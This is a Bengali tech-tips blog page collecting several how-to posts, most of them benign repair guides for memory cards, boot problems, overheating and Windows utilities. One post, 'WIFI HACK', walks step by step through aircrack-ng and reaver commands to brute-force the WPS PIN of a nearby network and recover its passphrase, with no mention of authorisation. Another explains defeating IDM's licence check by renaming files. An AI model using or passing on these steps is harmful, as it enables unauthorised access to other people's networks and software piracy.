Tutorial লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান
Tutorial লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান

নষ্ট মেমোরি কার্ড ঠিক করার উপায় ।

নষ্ট মেমোরি কার্ড ঠিক করার উপায় ?
তথ্য আদান প্রদান করার সময় ফোনের মেমোরি কার্ড হঠাৎ.খুলে নেওয়া হলে বা কোনো ভাবে সংযোগ বিছিন্ন হলে সেটি ক্ষতিগ্রস্ত হয়ে অকেজো হতে পারে। নানাভাবে এমন অকেজো মেমোরি কার্ড সচল করা গেলেও সম্পূর্ণভাবে ক্ষতিগ্রস্ত এবং বাহ্যিকভাবে নষ্ট প্রায় কার্ডকে ঠিক করতে ডেটা রিকভারি সফটওয়্যার ব্যবহার করতে হবে। মেমোরি কার্ডের তথ্য দেখা যাচ্ছে, কিন্তু সেটি ব্যবহার করা না গেলে আপনাকে এই সফটওয়্যার সমাধান দিতে পারে। এ ক্ষেত্রে ডেটা উপস্থিত থাকে কিন্তু কম্পিউটার বা অন্য যন্ত্র সেটিকে পড়তে (রিড) পারে না।

এক্ষেত্রে সবাই ভাবে যে মেমোরি কার্ডটি বোধহয় নষ্ট হয়ে গেছে। কিন্তু না, এমন অবস্থা থেকে আমরা মেমোরি কার্ডটাকে ফিরিয়ে আনতে পারি।
জন্য কার্ড রিডারে মেমোরি কার্ড ঢুকিয়ে নিয়ে কম্পিউটারে সংযোগ দিন। খেয়াল রাখুন, মেমোরি কার্ড ফাইল এক্সপ্লোরারে বা হার্ড ড্রাইভের অন্যান্য ডিস্কের মতো দেখালে এটিতে প্রবেশ করা যাবে না, কিন্তু ফাইল সিস্টেম ঠিক আছে। এবার য়াপনার উইন্ডোজ এর স্টার্ট মেন্যুতে গিয়ে cmd লিখুন। এতে আপনার স্টার্ট মেন্যুর উপর দিকে কমান্ড প্রম্পট(cmd) দেখা যাবে। এখন এর ওপর ডান বোতাম চেপে Run as administrator নির্বাচন করে সেটি খুলুন। কমান্ড
প্রম্পট চালু হলে এখানে chkdsk mr লিখে enter ক্লিক করুন। এখানে m হচ্ছে মেমোরি কার্ডের ড্রাইভ। কম্পিউটারে কার্ডের ড্রাইভ লেটার যে টি দেখাবে সেটি এখানে লিখে চেক ডিস্কের কাজটি সম্পন্ন হতে দিন।
এখানে convert lost chains to files বার্তা এলে y চাপুন। এ ক্ষেত্রে ফাইল কাঠামো ঠিক থাকলে কার্ডের তথ্য আবার ব্যবহার করা যাবে। মেমোরি কার্ড যদি invalid file system দেখায় তাহলে সেটির ড্রাইভের ডান ক্লিক করে Format-এ ক্লিক করুন। File system থেকে FAT নির্বাচন করে Quick format-এর টিক চিহ্ন তুলে দিয়ে Format-এ ক্লিক করুন। ফরম্যাট সম্পন্ন হলে মেমোরি
কার্ডের তথ্য হারালেও কার্ড নষ্ট হবে না।
Read more

আবিষ্কার করুন উইন্ডোজের এর কিছু অসাধারণ গোপন সফটওয়ার!!!

আপনি কি আপনার উইন্ডোজের এর সম্পর্কে সবকিছু জানেন? সেটা-ত মনে হয় না 😛 আপনি ভাবতেও পারবেন না যে কত কিছু রয়েছে এই উইন্ডেজের মধ্যে!! আমার কিছু নির্বাচিত সফটওয়ার আপনাদের কাছে আজকে তুলে ধরলাম। আমি জোর গলায় বলতে পারি যে আপনারা অধিকাংশ-ই এগুলো সম্পর্কে জানেন না! 😛 এগুলো উইন্ডোজের মধ্যে আগে থেকেই ইনস্টল করা আছে! এ কারণে আপনাদের ভাইরাস নিয়ে কোন চিন্তা-ভাবনা করার দরকার নেই 😛 এগুলো কাজ করবে, Windows Xp, Windows Vista, Windows 7 আবার  খুব সম্ভবত Windows 8 এও হতে পারে।

উইন্ডোজের কিছু গোপন সফটওয়ার:

১. Private Character Editor

Private Character Editor দিয়ে সহজেই আপনার উইন্ডোজের Font বা আপনার নিজের ইন্সটল করা Font Edit করতে পারবেন। আমি এটি দিয়ে আমার নিজের Font Collection করেছি।
  • Click start—type run—type eudcedit

২. Dr. Watson

এটি উইন্ডোজের Built-In repairing সফটওয়ার। এটি আগে থেকেই উইন্ডোজে ইন্সটল করা থাকে। এটি-ই আপনার কম্পিউটারের Error Message দেয়, কম্পিউটার Crash করার সময়। এটি একটি খুব গুরুত্বপূর্ণ সফটওয়ার আপনার কম্পিউটারের ত্রুটি বের করার জন্য এবং যথাসম্ভব সেটাকে ঠিক করার জন্য।
  • Click start—type run—type drwtsn32 / dwwin

৩. Media Player 5.1

আপনি কি এখনও আপনার Default Media Player ব্যবহার করতে পছন্দ করেন? এটি প্রায়সই Crash করে! কিন্তু আমি একটি পদ্ধতি বলব যার মাধ্যমে আপনি আপনার Media Player কে Downgrade করে Media Player 5.1 এ করতে পারবেন। এটি Latest Update টার থেকেও ভাল কাজ করে। কোন চিন্তা করবেন না! আপনি আবার আপনার Default Media Player ব্যবহার করতে পারবেন আবার পুরাতনটাও ব্যবহার করতে পারবেন!
  • Click start—type run—type mplay32 / mplayer / wmplayer

৪. IExpress

এটি আসলেই অনেক কাজের সফটওয়ার। এটি দিয়ে আপনি আপনার নিজের Setup ফাইল তৈরী করতে পারবেন। (Self-extracting setup file) এখন থেকে সহজেই নিজের .exe ফাইল তৈরী করুন!!
  • Click start—type run—type iexpress

Read more

প্যাচ, সিরিয়াল অথবা বিভিন্ন পদ্ধতি দিয়ে IDM ফুল ভার্সন করার পরও ফেক সিরিয়াল এর সমস্যা দেখায়? সমাধান করুন মাত্র দুইটি ফাইল পরিবর্তন করে।

IDM দিয়ে ডাউনলোড করার সময় যদি ফেক সিরিয়াল মেসেজটি শো করার পর নতুন রেজিষ্ট্রেশন কী চায় তাহলে কেমন লাগে। তাও আবার কতক্ষন পর পর। IDM ফেক সিরিয়াল নাম্বারের প্রবলেম স্লব করার জন্য অনেক টিউন হয়েছে, আমিও অনেকের টিউন অনুসরন করে সমাধান করার চেষ্টা করেছি কিন্তু কিছুদিন পর এ্কই অবস্থা। তাই দেখুন আমার ট্রিকটি কাজ করে কি না।
প্রথমে বলে রাখি যাদের পিসিতে ফাইল এক্সটেশন শো করেনা তারা নিচের পদ্ধতি অনুসরন করে চালু করে নিন।
প্রথমে My Computer এ যান মেনু বার হতে Organize এ ক্লিক করুন Folder and search Option এ ক্লিক করুন View তে ক্লিক করুন এবার নিচের চিত্র অনুসরন করুন।


Hide extensions for known file types এ যদি টিক দেওয়া থাকে, তুলে দেন Apply দিয়ে Ok দিন কাজ শেষ।

যাদের IDM ইন্সটল করা আছে তা্রা অতি তাড়াতারি-
* My Computer এ যান
* প্রোগ্রাম ফাইলে
* IDM ফোল্ডারে প্রবেশ করুন
* IDMGrHlP.exe এই ফাইলটি খুজুন না পাইলে সার্চ বক্সের সাহায্য নিন।
* IDMGrHlP.exe এর উপর মাউস রেখে রাইট ক্লিক করুন রিনেম ক্লিক করুন এখানে দেখুন শুধু IDMGrHlP ফাইলটি সিলেক্ট অবস্থায় আছে আগে কী বোর্ড হতে Ctrl+c= কপি করুন। তারপর IDMGrHlP.exe এই ফাইলের এক্সটেনশন মানে .exe টি কেটে দিন ডট সহ কাটবেন, এবার মাউস যে কোন জায়গায় ক্লিক করুন পারমিশন চাইলে ওকে দিন।
* idmBroker.exe নামে একটি ফাইল আছে তা খুজুন না পাইলে সার্চ বক্সের সাহায্য নিন।
এবার আমরা এক্সটেশন কাটবনা, মনে আছে IDMGrHlP ফাইল নেমটি কপি করেছিলেন, এখন idmBroker.exe  ফাইলটির উপর রাইট ক্লিক করে পূর্বের মত রিনেইম করুন এখন দেখেন শুধু idmBroker ফাইল নেইমটি সিলেক্ট আছে এখন Ctrl+V =পেষ্ট করুন, তারপর যে কোন জায়গায় ক্লিক করুন কোন কিছু চাইলে ওকে দিন না চাইলে নাই, কম্পিউটার রিস্টার্ট করুন দেখুন সমস্যা সমাধান হয়েছে কিনা।


Read more

এবার কম্পিউটার চালু না হলেও (বুট না হলে) ভয় নেই ডাটা ট্রান্সফার করুন যেকোন ড্রাইভে !

কাজ করতে বসবেন। কম্পিউটার চালু করতে গিয়ে দেখা গেল চালু হচ্ছে না পাওয়ার আছে ঠিকই কিন্তু বুট হচ্ছে না, নিজে নিজেই রিস্টার্ট হচ্ছে অথবা মেসেজ আসছে System file missing । অবস্থা দেখে মনে হচ্ছে অপারেটিং সিস্টেম ক্র্যাশ করেছে। জরুরী ফাইল রয়েছে এই পিসিতে। এখন উপায় হচ্ছে পূনরায় অপারেটিং সিস্টেম ইন্সটল করা। তাছাড়া যে ড্রাইভে ফাইল রয়েছে (Desktop, My documents) সে ড্রাইভ ফরমেটিং করে সিস্টেম ইন্সটল করলে জরুরী ডাটাগুলো মুছে যাবে। তাছাড়া অপারেটিং সিস্টেম ইন্সটল করা অনেক সময় সাপেক্ষ ব্যাপার। সেক্ষেত্রে যদি একাধিক পিসি থাকে তাহলে কাজটা সেরে নেয়া যায় পেনড্রাইভ বা অন্য কোন মিডিয়া দিয়ে ফাইল ট্রান্সফার করে নিতে পারলে। কিন্তু পিসিই তো চালু হচ্ছেনা। ফাইল ট্রান্সফার করার উপায় কী? আপনার এই দুর্যোগের মুহুর্তে সাহায্য করতে পারে Rescue Kit 11 Free Edition.


এই সফটওয়্যারটি উইন্ডোজ ছাড়াই চালু  হয়। এটি একটি লাইভ সিডি।
১। সবগুলো ড্রাইভ, ফাইল এবং ফোল্ডার দেখায়।
২। এক ড্রাইভ থেকে অন্য  ড্রাইভে (পেন ড্রাইভ এবং সিডিসহ) ফাইল ট্রান্সফার করা যায়।
৩। ভাগ্য ভাল হলে অপারেটিং সিস্টেমের যেসব ফাইল মিসিং এর কারণে কম্পিউটার চালু হচ্ছেনা সেগুলো রিপেয়ারও হয়ে যেতে পারে অর্থাৎ রিপেয়ার অপশনও আছে এটাতে।
৪। মুছে যাওয়া পার্টিশন ফেরত আনা যায়।
প্রথমেই এই লিংক থেকে ডাউনলোড করে নিন। (50 MB)
এই লিংক থেকে সিরিয়াল ডাউনলোড করুন
এবার সিডি তৈরি করার পালা।
একটা খালি সিডি সিডি রমে প্রবেশ করাতে হবে।
ডাউনলোড করা rk_free.exe  ফাইলটিতে ডাবল ক্লিক করুন।
Next এ ক্লিক করুন...
এবার Product Key এবং Serial Number কপি করে পেষ্ট করুন..
Next এ ক্লিক করুন...
 Optical Disc সিলেক্ট করে Next এ ক্লিক করুন...
Eject the disc after burning এর টিক চিহ্ন দিয়ে  Next এ ক্লিক করুন...
কিছুক্ষণের মধ্যে বের হয়ে আসবে।
এবার যত্ন করে সিডিটি রেখে দিন। যখন আপনার পিসি বুট হবেনা তখন সিডিটি রমে প্রবেশ করিয়ে পিসি স্টার্ট করুন। নিচের ছবিটির মতো দেখা যাবে। এবার আপনার প্রয়োজনীয় কাজটি সেরে নিন।
আপনি হয়তো ভাবছেন এত কষ্ট করে ৫০ মেগাবাইট ডাউনলোড করে সিডি তৈরি করে লাভ কী। দুর্যোগ আসার আগেই তৈরি হয়ে থাকা ভাল। যখন বিপদে পড়বেন তখন এই অধমের পরামর্শ কাজে লাগবে।
যখনই পিসি বুট হবেনা তখনই প্রবেশ করান আপনার সেই বিখ্যাত (!) সিডিটি।
নিচের ছবিটির মতো একটা স্ক্রীন আসবে।
এখান থেকে আপনার প্রয়োজন অনুযায়ী অপশন সিলেক্ট করে কাজ সেরে নিন।
Read more

পেনড্রাইভ বা মেমোরি কার্ড ফরমেট হয় না- জেনে নিন এর সহজ সমাধান।

মাঝে মাঝে কিছু ভাইরাসের কারনে পেনড্রাইভ বা মেমোরি কার্ড ফরমেট হয় না অথবা পেনড্রাইভের স্পেস অনেকটা ব‍্যবহারের অযোগ‍্য হয়ে যায়। যাকে মেমোরির ভাষায় আনএলোকেটেড স্পেস বলা হয়। এই অানএলোকেটেড স্পেস সাধারনভাবে ফরমেট করা যায় না বলে একে কোন কাজে লাগানো যায় না। কম্পিউটারে ডস মোডের মাধ‍্যমে সহজেই এই আনএলোকেটেড স্পেসকে ফরমেট করে ব‍্যাবহার উপযোগী করা যায়। যেসকল পেনড্রাইভ বা মেমোরি সাধারনভাবে ফরমেট করা যায় না তাও এ উপায়ে ফরমেট করা যায়।



তো চলুন শুরু করিঃ
১। প্রথমে কম্পিউটার চালু করে পেনড্রাইভ বা মেমোরি কার্ড কম্পিউটারে কানেক্ট করে start+run এ যেতে হবে এবং সেখানে cmd লিখে এন্টার চাপতে হবে।
২। ডস মোডে কমান্ড প্রম্পট চালু হবে।
৩। এখানে diskpart লিখে এন্টার চাপতে হবে।
৪। list disk লিখে এন্টার চাপতে হবে।
৫। এখন একটা লিষ্টে পেনড্রাইভ সহ যে মেমোরি ড্রাইভগুলো কম্পিউটারে কানেক্ট করা আছে সেগুলো দেখাবে
৬। select disk 1 লিখে এন্টার চাপতে হবে। (কম্পিউটারে শুধু হার্ডডিস্ক ও পেনড্রাইভ লাগানো থাকলে disk 1 এ পেনড্রাইভ থাকে।)
(আরো ড্রাইভ লাগানো থাকলে disk 2 বা disk 3 হতে পারে। তখন select disk 2 বা select disk 3 লিখে এন্টার চাপতে হবে)
৭। clean লিখে এন্টার চাপতে হবে।
৮। creat partition primary লিখে এন্টার চাপতে হবে।
৯। exit লিখে এন্টার চাপতে হবে।
এখন দেখবেন আপনার পেনড্রাইভের সম্পূর্ণ স্পেস ব‍্যবহারের উপযোগী। যে পেনড্রাইভ বা মেমোরি ফরমেট হত না তা এখন আগের মত ফরমেট দিন। অবশ‍্যই ফরমেট নিবে।
Read more

কম্পিউটার এর ছোট খাটো সমস্যার সমাধান।

কম্পিউটার চালাতে গিয়ে আমরা কতই না বহুমুখী সমস্যার সম্মুখীন হই ।সেই সমস্যা ছোট হোক বা বড় হোক আমরা একদল লোক আছি যারা সমস্যা দেখলেই সার্ভিস সেন্টারে দৌড় দেই ।কিন্তু আপনি চাইলে নিজে নিজেই কম্পিউটারের সাধারণ সমস্যাগুলো সমাধান করে ফেলতে পারেন ।এতে একদিকে যেমন আপনার অর্থ বাঁচবে, তার পাশাপাশি আপনি আস্তে আস্তে হয়ে উঠবেন ছোটখাটো একজন কম্পিউটার এক্সপার্ট । আমার আজকের এই টিউনের উদ্দেশ্য অন্তত তাইই ।সুতরাং আর কথা বাড়াবো না ।চলুন আসল কাজ শুরু করা যাক.....

সমস্যা:সিস্টেম চালু হচ্ছেনা
সমাধান:মেইন পাওয়ার ক্যাবলের সংযোগটি loose কিনা চেক করুন ।যদি ঢিলে না হয় তবে মেইন বোর্ডে পাওয়ার আসছে কিনা দেখুন ।না আসলে বুঝতে হবে পিসির পাওয়ার সাপ্লাই ইউনিটে সমস্যা আছে ।এক্ষেত্রে পাওয়ার সাপ্লাই ইউনিট পরিবর্তন করতে হবে ।
সমস্যা:সিস্টেম সঠিকভাবে চলছে কিন্তু মনিটরে কিছু দেখা যাচ্ছেনা ।
সমাধান:সিস্টেম অফ করুন এবং মেইন সিস্টেম থেকে ক্যাবল খুলে ফেলুন ।এবার একটি ইরেজার দিয়ে Ram এর কানেক্টর এবং Ram Slot পরিষ্কার করে র্যামটি আগের মতো লাগান এবংপিসি স্টার্ট করুন ।পিসি অন হওয়ার সময় যদি কোনো বিপ সাউন্ড হয় তাহলে বুঝেই নেন যে আপনার পিসির র্যামটি সমস্যাযুক্ত । যদি Display তে কিছু না আসে তাহলে নতুন Ram লাগান ।কারণ ৫০% ক্ষেত্রে Display না আসার কারণ র্াম এর সমস্যা ।শেষ পর্যন্ত যদি সমাধান না হয় তাহলে আপনার নিকটস্ত কোনো সার্ভিস সেন্টারে নিয়ে দেখান ।
সমস্যা:সিস্টেম অত্যন্ত গরম হয়ে যায় এবং অস্বাভাবিকভাবে বন্ধ হয়ে যায় ।
সমাধান:পিসির ক্যাবিনেটটি খুলুন এবং মাদার্বোর্ড থেকে CPU ফ্যানটি সরান ।কিন্তু প্রসেসর সরানো যাবেনা ।ফ্যান খুলার পর হয়তো দেখবেন ভেতরে বা Hit Sink এ প্রচুর ধুলোবালি জমে আছে যা বায়ু চলাচলকে বাধাগ্রস্হ করছে ।এক্ষেত্রে Heat Sink এবং ফ্যানটিকে ভালোভাবে পরিষ্কার করে জায়গামতো লাগান এবং পিসি অন করুন ।
সমস্যা:কোনোরুপ উত্তপ্ত হওয়া ছাড়াই পিসি কয়েক মিনিট পরপর ShutDown হয়ে যাচ্ছে ।
সমাধান:সতর্কতার সাথে পিসির মাদার্বোর্ড দেখে নিন ।লক্ষ্য করুন লিকযুক্ত বা ক্রুটিপূর্ণ ক্যাপাসিটির উপর থেকে খুলে এসেছে কিনা ।যদি এরকম হয় তবে ক্যাপাসিটরকে ভালো করে লাগিয়ে নিলেই হয় । কিন্তু IC যদি অতিরিক্ত তাপ উৎপাদন করে তাহলে মেরামতের জন্য সার্ভিব সেন্টারে যাওয়া ছাড়া উপায় নেই ।
সমস্যা:উইন্ডোজ রান করার সময় আটকে থাকে বা হ্যাং করে ।
সমাধান:আপগ্রেড এন্টিভাইরাস দিয়ে ভাইরাস চেক করুন ।যদি ধরা না পড়ে তবে C ড্রাইভ ফরম্যাট করে নতুন করে OS সেটাপ করুন । তবে তার আগে অবশ্যই ডাটার ব্যাকাপ করে নিবেন ।
সমস্যা:পিসির পাওয়ার অন করলে Display আসার পর পিসি হ্যাং করে ।
সমাধান:
প্রথম ধাপ:
পিসির পাওয়ার অফ করে কেসিংয়ের এক পার্শ্ব খুলে হার্ড ডিস্ক, CD/DVD ROM এর ক্যাবল খুলে আবার জায়গামতো লাগান এবং পিসি অন করুন ।এরপরও যদি সমস্যা থেকে যায়-
দ্বিতীয় ধাপ:
মাদারবোর্ডের ক্রতিটি হারাডওয়্যার ভালো করে পরিক্ষা করুন এবং কোনো ক্রুটি থাকলে ঠিক করুন ।এরপরও যদি একই সমস্যা থাকে-
তৃতীয় ধাপ:
মাদারবোর্ডটিকে অন্য একটি পিসিতে সংযুক্ত করে দেখুন ঠিক আছে কিনা ।যদি না চলে তাহলে বুঝে নিবেন মাদারবোর্ডের মৃত্যু হয়েছে :p
সমস্যা:পিসির মেটাল অংশে স্পর্শ লাগলে শক করে ।
সমাধান:পিসির মেটাল অংশে যদি হাত কিংবা স্পর্শ লাগলে শক করে তাহলে বুঝতে হবে আপনার পিসি আর্থিং করানো নেই ।এক্ষেত্রে আপনি একজন ইলেকট্রিশিয়ানের সহায়তায় পিসিটিকে আর্থিং করিয়ে নিতে হবে ।
সমস্যা:পিসির সময় তারিখ ঠিক থাকেনা বা বায়োসের কোনো সেটিংস পরিবর্তন করলে সেইভ হয়না ।
সমাধান:Motherboard এর সংযুক্ত CMOS Battery কার্যক্ষমতা হারালে এমনটি ঘটে ।তাই এক্ষেত্রে একমাত্র সমাধান হল নতুন সিমোস ব্যাটারি লাগানো ।
সমস্যা:মনিটরে কোনো পাওয়ার নেই ।
সমাধান:পাওয়ার বোতাম চালু আছে কিনা নিশ্চিত হন এবং এও নিশ্চিত হন যে AC POWER কর্ডটি পেছনে এবং পাওয়ার আউটলেটে ভালোভাবে সংযুক্ত আছে কিনা ।
সমস্যা:মনিটরে পাওয়ার অন কিন্তু কোনো ছবি নেই ।
সমাধান:মনিটরের সাথে ভিডিও ক্যাবলটি পিসির সাথে ভালভাবে যুক্ত আছে কিনা দেখুন ।না থাকলে দৃঢ়ভাবে লাগিয়ে নিন ।কাজ না করলে Contrast and Brightness ঠিক করে দেখুন ।
সমস্যা:কীবোর্ড কাজ করছেনা
সমাধান:কীবোর্ড পিসির পোর্টের সাথে ভালভাবে যুক্ত আছে কিনা সে বিষয়টি লক্ষ্য করুন ।যদি ঠিক থাকে তাহলে ভাইরাস চেক করে ডিলিট করুন ।তাও যদি না হয় তবে বুঝতে হবে কীবোর্ডটি নষ্ট হয়ে গেছে ।এক্ষেত্র নতুন কীবোর্ড কিনতে হবে ।
সমস্যা:মাউস কাজ করেনা বা মাউস ডিটেক্ট করেনা ।
সমাধান:পিসির পোর্ট চেক করুন এবং বায়োসে প্রবেশ করে দেখুন মাউস Disable করা কিনা ।যদি Disable করা থাকে তাহলে এনাবল করে সেইভ করে বেরিয়ে আসুন ।
সমস্যা:Boot Disk Failure or Hard Disk Not Found ম্যাসেজ প্রদর্শন করে ।
সমাধান:কম্পিউটার বন্ধ করে কেসিং খুলে Motherboard এবং Hard Disk Drive এর সাথে Data Cable এবং Power Supply Unit থেকে Hard Disk সংযুক্তস্থলে কোনো লুজ আছে কিনা তা চেক করুন ।ঠিক থাকলে Hard Disk এর পিছনের জাম্পার সেটিং অনুসরণ করে ড্রাইভটির জাম্পার সেটিং ঠিক আছে কিনা চেক করুন । Hard Disk Failure ম্যাসেজ দেখালে পিসি চালিয়ে বায়োসে প্রবেশ করে হার্ড ডিস্ক ড্রাইভটিকে বায়োসের অপশন থেকে অটো কিংবা ম্যানুয়ালি ডিটেক্ট করে কিনা তা দেখুন ।যদি সমস্যার সমাধান না হয় তাহলে অন্য একটি ভালো পিসিতে hard disk লাগিয়ে দেখুন চলে কিনা ।কাজ না করলে নতুন hard disk লাগিয়ে নিতে হবে ।
সমস্যা:কম্পিউটার ঘন ঘন হ্যাং করে বা রিস্টার্ট নেয় ।
সমাধান:কম্পিউটারের সিপিউর উপর যুক্ত কুলিং ফ্যানটি না ঘুরলে কিংবা পর্যাপ্ত ঠান্ডা না থাকলে এ ধরনের সমস্যা হতে পারে ।সেক্ষেত্রে পিসির কেসিং খুলে কুলিং ফ্যানটিকে ভালভাবে চেক করতে হবে ।প্রয়োজনে নতুন কুলিং ফ্যান স্থাপন করে নিতে হবে ।এছাড়াও অনেক সময় ভাইরাস সমস্যার কারণেও এমনটি হয়ে থাকে ।তাই আপনার পিসিতে অবশ্যই ভালো মানের কোনো এন্টিভাইরাস ব্যাবহার করবেন এবং তা নিয়মিত আপডেট করবেন ।ব্যাকডেটেট এন্টিভাইরাস নতুন নতুন ভাইরাসের বিরুদ্ধে কাজ করতে পারেনা ।
আজ এই পর্যন্তই ।আবারও আপনাদের সামনে হাজির হবো নতুন কোনো টিউন নিয়ে খোদা হাফেজ ।
Read more

ল্যাপটপ অতিরিক্ত গরম হয়ে যাচ্ছে? সমাধান নিন।

নতুন ল্যাপটপ কেনার পর প্রায় বছর খানেক ভাল ভাবেই সার্ভিস দেয় । এর পর বেশি গরম হয়ে যায় নীল স্ক্রিন চলে আসে মাঝে মাঝে। স্লো হয়ে যায়। সেক্ষেত্রে আপনার যা করনীয়। যেখান দিয়ে ল্যাপটপের গরম বাতাস বের হয় সেখানে যদি একটি ডিম রেখে দেন তা হলে আমার মনে হয় ডিমটি খাওয়ার উপযুক্ত হয়ে যাবে।
প্রথম ধাপ:---


আপনার ল্যাপটপের ব্যাটারিরে আইকন টিতে Left বাটনে ক্লিক করে মোর পাওয়ার অপশনে যান। এরপর পরের চিত্র টি দেখুন।

এর পর    High performance    থেকে       Change plan setting --এ ক্লিক করুন। এরপর পরের চিত্র টি দেখুন।

Change advanced power setting ---এ ক্লিক করুন।






 

 এর পর  Step-5,এ ক্লিক করুর  and  Step-6 -এর Plugged in: এখানে ক্লিক করুন। এরপর




Plugged in 85% করে Apply then ok ক্লিক করুন। এরপর রিস্টাট করে দিন ।
এরপর যদি কাজ না করে তবে আপনাকে আরেকটু কষ্ট করতে হবে যেমন:-----------

ল্যাপটপের পিছনের ব্যাক কাভার খুলুন এর পর এই কাজটি করুন যেমন:--------

বাতাস বের হবার রাস্তা এবং ফ্যান ক্লিন করে দিন। এর পর আরেকটি কাজ করবেন যেমন:-----  তার আগে একটি কথা বলে নেই ল্যাপটপ বালিসের উপর রেখে ব্যবহার করবেন না তা হলে আর বেসি গরম হবে। নিচের চিএটি দেখুন

এমন ভাবে ল্যাপটপ বসাবেন যাতে করে বাতাস যাওয়া আসা করতে পারে।  আরো ভালোহবে ল্যাপটপের নিচে পাখা ব্যবহার করুন।    আশারাখি সবার উপকারে আসবে।
Read more

WIFI HACK করুন !

এইটা করার জন্য আপনাকে অবশই লিনাক্স এর যে কোন ভার্সন ইন্সটল করে নিতে হবে তবে ভাল হয় যদি (Linux mint,Ubuntu , kbuntu) এসব ভার্সন  ইন্সটল করা থাকে ।
এবার ctrl+alt+t press করুন terminal ওপেন করুন
please install Aircrak-ng
by typing - sudo apt-get install aircrack-ng এইটা লিখে এন্টার করুন যথারীতি আপনার পিসির পাসওয়ার্ড চাইবে পাসওয়ার্ড লিখে এন্টার করুন আর হ্যাঁ এর আগে নেটটা পিসির সাথে connect করতে ভুলবেন না ।
তারপর আবার ইন্সটল করুন Reaver
pls type : sudo apt-get install reaver আবার আগের মত এন্টার চাপার পর  পাসওয়ার্ড চাইবে ,পাসওয়ার্ড  দিন অ্যান্ড  এন্টার
এবার নেট connection অফ করে পিসি restart করুন ।
এবার আপনাকে অবশ্যই সামান্য  ধৈর্যর পরীক্ষা দিতে হবে
terminal ত ওপেন ই আছে না থাকলে ওপেন করে নিন টাইপ করুন
sudo airmon-ng start waln0 লিখে এন্টার করন পাস কোড চাইবে দিন
দেখবেন নিচে একটা লেখা আসবে ( monitor mode enabled on mon1/mon0/mon4)
ব্যাস হয়ে গেল প্রথম স্টেপ
please type : sudo airodump-ng mon0   (এখানে MONO র সাথে zero hobe )

এবার আপনি  দেখবেন আশে পাশের ওয়াইফাই র নেট গল শো করছে screen shot অনুযায়ী
now final step
press cntrl+c
sudo reaver -i mon0 -b (your desired bssid)  -vv -d 0 -S
example :  sudo reaver -i mon0 -b C8:3A:35:26:D5:31 -vv -d 0 -s
press enter  and wait for while,  then u will show after some time
like this
wps pin:25452006
wps psk:sakkhor /whatever they used their name as network
ap ssid : tplink /tenda/whaterver they used
enjoy !!!!!!!!!!! enjoy!!!!!!!!! enjoy!!!!!!!!
Read more

জিপি মোডেম ব্যাবহার করে কল করার উপায় সাথে plugins active করা

আপনাদের কল করার জন্য সফটওয়্যারটি শেয়ার করলাম। আশা করি কাজে লাগবে।

  • ১। Connection:



মডেম এর ডেফল্ট ডেশবোর্ড এ voice call/ video call (3g only) / mms/ ussd (Balance check) করার সুবিধা আছে। কিন্তু তা সেটাপের সাথে দেওয়া থাকেনা
huawei এর মডেম এ সকল সুবিধা কিভাবে পুনরায় চালো করবেন?
প্রথমেই আপনাদেরকে huawei মডেম এর সব প্লাগিন সহ default dashboard download করতে হবে
আমি যে ফাইল টি দিলাম তা ডাউনলোড করুন।
জিপি ইন্টারনেট অ্যাপ্লিলেকেশন Exit করুন । ফাইল টি সেটাপ দিন password:981087
Now জিপি ইন্টারনেট অ্যাপ্লিলেকেশন রান করুন।
এঞ্জয় করুন
ডাউনলোড
http://www.ziddu.com/download/17739893/FullpluginsActivatorGpModeme1550.exe.html
Read more

মেমোরীকার্ড, পেন ড্রাইভ ও পিসি এর ড্রাইভের Background এ ছবি সেট করুন !

যখন একটি মেমোরীকার্ড, পেনড্রাইভ বা পিসি এর কোন ড্রাইভ ওপেন করা হয় তখন তার Background স্বাভাবিক ভাবে সাদা থাকে ! অর্থাত্‍ ওই ড্রাইভের ফোল্ডারের নিচে কোন ছবি দেখা যায় না ! এবার আপনি নিজেই আপনার ছবি সেট করে নিন ! বিশ্বাস না হলে এখান থেকে ফাইলটি ডাউনলোড করুন এবং আনজিপ করুন ! আনজিপ করলে Rubelttc ও desktop এই নামের 2 টা ফাইল পাবেন ! ওই দুটা ফাইল কপি করে মেমোরীকার্ড , পেনড্রাইভ বা পিসি এর যেকোন ড্রাইভে পেস্ট করুন ! এবার মাউস দিয়ে রিফ্রেস করুন ! দেখুন আপনার ওই ড্রাইভের Backgroud এ ছবি চলে এসেছে !

আপনার ছবি সেট করতে চাইলে নিচের ধাপগুলি অনুসরন করুন !
  • 1. প্রথমে আপনার যেই ছবি সেট করবেন ওটা কপি করুন ও যেই ড্রাইভে ফাইল দুটি রেখেছেন ওখানে পেস্ট করুন !
  • 2. এবার ওই ছবি রিনেম করে এর নাম কপি করুন !যেমন ধরুন, আপনি যেই ছবি সেট করবেন তার নাম Ruhul ! Ruhul নামের ছবিটি রিনেম করে কপি করুন !


  • 3.desktop নামের এই ফাইলটি ওপেন করে যেখানে Rubelttc লেখা আছে ওখানে Rubelttc মুছে দিয়ে ওই লেখা পেস্ট করুন !
  • firefox
  • এবার File menu থেকে Save করে Close করুন !
  • firefox
  • 4. এবার রিফ্রেস করুন ! তহলে দেখবেন যে Background এ আপনার ছবি চলে এসেছে !
  • 5. এবার আপনি আপনার ওই ছবি ও এই ফাইল হিডেন করুন যেন ওই ফাইলগুলি দেখা না যায় !
  • আর আমার ছবি মন চাইলে রেখে দিন না চাইলে delete করে দিন ! এই টিউনটি কেউ করে থাকলে ক্ষমা করবেন !
    একটু লক্ষ্য করুন :
  • আপনি যেই ছবি সেট করবেন সেটি অবশ্যই jpg অথবা jpeg ফরমাটের হতে হবে ! অন্য ফরমাটের হলে হবে না !
  • আপনি শুধু মাত্র ড্রাইভে এটি সেট করতে পারবেন ! ফোল্ডার করলে হবে না !

  • Read more

    Undeletable ফাইলকে Delete করার সহজ উপায় !

    কখনো কখনো কোন ফাইল ডিলিট করতে গেলে একটি error message দেখায় যে file cannot be deleted/ Windows was unable to delete the file. ফাইটি যেকোন কারনে corrupt/compromise হওয়াতে explorer.exe ফাইলটিকে execute করতে থাকে ফলে আপনি ফাইলটিকে ডিলিট করতে পারেন না। যাইহোক দীর্ঘ আলোচনায় না গিয়ে কিভাবে একটি Undeletable ফাইলকে Delete করা যায় তা নিয়ে আলোচনা করি:



    1. প্রথমেই Command Prompt ওপেন করে ফেলে রাখুন।
    2. যাবতীয় সকল সফট্ওয়্যার বন্ধ করুন। (খোলা থাকলে)
